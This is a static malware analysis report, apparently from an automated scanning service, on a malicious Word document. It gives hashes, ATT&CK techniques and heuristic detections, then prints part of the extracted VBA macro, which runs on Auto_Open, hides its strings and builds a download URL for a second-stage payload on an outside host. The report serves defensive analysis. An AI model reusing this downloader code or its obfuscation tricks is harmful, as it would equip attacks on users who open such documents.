Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c8f269a1966e5bc3…

MALICIOUS

Office (OLE)

71.0 KB Created: 2015-02-17 08:36:00 Authoring application: Microsoft Office Word First seen: 2016-04-08
MD5: 22dd3265ae547efa47338ac53281f863 SHA-1: cb4864d35b7d68ef5d9bdafbf62cab3c3180acb1 SHA-256: c8f269a1966e5bc3481c6ef50d7d7213dee4a0773960e7e76e2c02d1f5c0075d
430 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains critical heuristic firings indicating the presence of VBA macros with auto-execution functions (AutoOpen, Auto_Open) and a Shell() call. The script obfuscates the WScript.Shell object and attempts to construct a URL for downloading a payload. The primary intent appears to be downloading and executing a second-stage payload from the constructed URL.

Heuristics 12

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA macros detected medium 8 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18082 bytes
SHA-256: e1f81284458bee6a7319610491030a72f9bad0db47e0b5939298fd0d940ba9a5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
    h
End Sub
Sub h()

    
     UEGHYFWEFYSDGFYQGHJBAHDBSMANDV = "j23gh hj43ghj4g2 hj3g432hyg hg4 2jh3g4h23 g4jhgh4j 2hjg 4hg23jh4g h23g4j h2g4h 2j3g2jhg4h2jghjagd sjahg"
     USER = Module1.Travel("userna" + Chr(109) + Chr(Asc("e")))
     ds = Sgn(44) + 97 + Sgn(5) + Sgn(98) + Sgn(902) + Sgn(-5)
     jks = ds
     PST2 = "" + "" & "" & "a" + "do" & "be" & "ac" & "d-u" & "pd" & _
     "a" & "te" + ""
     VBT2 = "" & "a" + Chr(100) + "o" & "b" & "ea" & "cd-up" & "da" & "te" & ""
     VBTXP2 = "" & "a" & Chr(100) & "o" & "be" + "ac" & "d-u" + "pd" + "atex" + "p" & ""
     BART2 = "" & "a" + Chr(100) & "o" & "b" & "e" + "ac" & "d-up" + "date" & ""
     
     PST1 = "" + PST2 + "." + Chr(Asc("p")) + Chr(ds + 15) + "1" + ""
     VBT1 = "" + VBT2 + "." + Chr(118) + "b" + Chr(Asc("s")) + ""
     VBTXP = VBTXP2 + "." + Chr(Asc("v")) + Chr(Asc("b")) + "s" + ""
     KSHUQ = "ht" + "tp://savepic.su/5050397" + "." + "jpg"
     
     STT = "" + "44" + "4." + "pn" + "g" + ""
     
     BART = "" + BART2 + Chr(Abs(ds - 100 - 45 - Sgn(5))) + Chr(Abs(ds - 100 - 96 - 2)) + Chr(Asc(Chr(Asc("a")))) + Chr(Asc(Chr(Abs(ds - 100 - 15 - 1)))) + ""
     
     JSIQOJQ = Chr(Abs(ds - 100 - 46)) + Chr(Abs(ds - 100 - 98)) + Chr(Asc(Chr(Abs(ds / 2 + 47)))) + Chr(Asc(Chr(ds + Fix(16.2)))) + "" & ""
          
          
     KJHDU = BART2 + JSIQOJQ
     BART = KJHDU
     MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + "Data\Lo" + "cal\T" + "emp\" + PST1 + "" & ""
     
        STAT = "" + "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + "Data\Lo" + "cal\T" + "emp\" + STT + "" & ""
     ASDASDSA = "" + "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + Chr(Asc("D")) + "ata\Local\" + Chr(Asc("T")) + "emp\" + BART + "" & ""
     MY_FILDIR = "c:\Users\" + USER + "\App" + "Data\Lo" + "cal\T" + "emp\" + VBT1 + ""
     
     
     XPFILEDIR = ""
     HJUTTT = VBTXP
     XPFILEDIR = "" + "c" & ":\W" & "indows\T" & "emp\" + HJUTTT
     UHFD = "" & "c" & ":\W" & "indows\T" & "emp\"
     TRT = UHFD + BART
     KRT = TRT
     HYF = KRT
     
     KJSAHDFFFJ = MY_FILDIR
     
     
     
     
     If (Len(Dir(MY_FILENDIR)) <> 0) Then
      SetAttr MY_FILENDIR, vbNormal
      Kill MY_FILENDIR
     End If
     
     If (Dir(ASDASDSA) <> "") Then
      SetAttr ASDASDSA, vbNormal
      Kill ASDASDSA
     End If
     
     
     If (Dir(MY_FILDIR) <> "") Then
      SetAttr MY_FILDIR, vbNormal
      Kill KJSAHDFFFJ
     End If
     
     
     If (Dir(STAT) <> "") Then
      SetAttr STAT, vbNormal
      Kill STAT
     End If
     
     
     If (Dir(XPFILEDIR) <> "") Then
      SetAttr XPFILEDIR, vbNormal
      Kill XPFILEDIR
     End If
      
     Dim Uuwqdhj, FileNumber, FileNumb, FileNu, FileNuG, FileNs, mttt, jskw As Integer
    
     Dim retVal As Variant
     
     FileNumber = FreeFile
     FileNumb = FreeFile
     FileNu = FreeFile
     FileNukk = FreeFile
     
     FileNs = FreeFile
     Kasdwq = FreeFile
     FileNuG = FreeFile
     
    Dim objWMIService As Variant
    Dim colOperatingSystems As Variant
    Dim objOperatingSystem As Variant
    Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
    SETL = "colOperatingSystemsKSAHDIUOQWdsad asad32k r8929h2f uigt8y yr2u3gby2g yu dg2uyg3bdu "
    
    Set colOperatingSystems = objWMIService.ExecQuery("Select * from W" + "in3" + "2_Op" + "eratin" + "gS" + "ystem")
    For Each objOperatingSystem In colOperatingSystems
        SysReport = SysReport & "The operating system on this computer is " & _
            objOperatingSystem.Caption & "  (" & objOperatingSystem.Version & ")"
    Next
     
    Set objWMIService = GetObject("winmgmts:{impersonationLevel
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.